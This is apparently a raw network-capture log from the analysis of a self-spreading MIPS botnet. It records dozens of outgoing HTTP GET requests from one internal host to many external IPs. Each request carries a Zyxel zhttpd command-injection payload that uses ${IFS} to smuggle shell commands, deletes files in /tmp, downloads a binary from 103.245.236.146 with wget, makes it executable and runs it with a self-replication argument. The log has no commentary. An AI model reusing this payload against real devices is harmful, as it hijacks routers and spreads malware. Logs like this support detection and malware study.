                                              Jan 29, 2024 07:03:44.913940907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3262192.168.2.144295098.64.71.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913971901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3263192.168.2.1437608213.201.56.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914020061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3264192.168.2.1438096203.142.53.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914048910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3265192.168.2.143347288.4.184.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914100885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3266192.168.2.144654232.91.168.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914150000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3267192.168.2.143574069.34.175.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914196968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3268192.168.2.1445650173.77.209.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914215088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3269192.168.2.1459784105.37.158.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914266109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3270192.168.2.1442552136.42.227.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914294004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3271192.168.2.144124045.82.250.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914319992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3272192.168.2.1458390152.212.13.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914355993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3273192.168.2.1437666135.82.199.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914383888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3274192.168.2.145720023.89.13.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914448977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3275192.168.2.145154846.199.31.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914505959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3276192.168.2.1438922194.4.95.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914530039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3277192.168.2.145181444.139.47.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914570093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3278192.168.2.144948672.75.52.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914604902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3279192.168.2.143436038.63.14.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914632082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3280192.168.2.1459280111.18.171.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914678097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3281192.168.2.143855475.110.91.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914706945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3282192.168.2.1442498219.171.163.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914743900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3283192.168.2.143676653.3.138.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914782047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3284192.168.2.1458148107.167.151.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914832115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3285192.168.2.1454576142.129.205.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914881945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3286192.168.2.144595241.97.138.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914911985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3287192.168.2.1447278104.172.143.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.914949894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3288192.168.2.1445396181.45.52.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.915008068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3289192.168.2.1452310176.21.44.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.915071964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3290192.168.2.144523866.169.242.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.915101051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3291192.168.2.1454570119.188.232.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.915147066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3292192.168.2.1449652203.139.58.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.915184021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3293192.168.2.143372694.57.20.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.915235043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3294192.168.2.144605271.56.255.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.915285110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3295192.168.2.1436848164.56.176.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.918848038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3296192.168.2.146003641.180.69.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.918875933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3297192.168.2.145995643.41.227.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926045895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3298192.168.2.1434710182.203.125.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926085949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3299192.168.2.143383886.108.1.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926120043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3300192.168.2.1454748132.139.213.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926156998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3301192.168.2.1444860198.179.79.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926191092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3302192.168.2.144206883.124.94.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926233053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3303192.168.2.1432768197.187.205.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926280022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3304192.168.2.144394236.229.251.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926295996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3305192.168.2.143450662.34.34.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926340103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3306192.168.2.143439234.108.67.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926373005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3307192.168.2.145382280.101.192.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926409006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3308192.168.2.1441438109.209.192.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926451921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3309192.168.2.1449998216.57.244.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926493883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3310192.168.2.145743247.99.83.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926532984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3311192.168.2.1460170193.130.237.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926584959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3312192.168.2.1447472121.83.254.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926628113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3313192.168.2.143354274.25.243.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926654100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3314192.168.2.1449366142.99.1.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926698923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3315192.168.2.144141076.207.188.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926745892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3316192.168.2.143494453.224.145.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926800013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3317192.168.2.1452990196.83.156.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926846981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3318192.168.2.145140440.204.94.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926873922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3319192.168.2.1439090132.192.54.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926892996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3320192.168.2.1436868202.161.163.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926933050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3321192.168.2.1445894196.105.198.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.926974058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3322192.168.2.145235860.57.242.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927068949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3323192.168.2.145457850.89.67.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927110910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3324192.168.2.1441966161.133.236.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.927133083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3325192.168.2.143953259.186.5.47443
                                              TimestampBytes transferredDirectionData
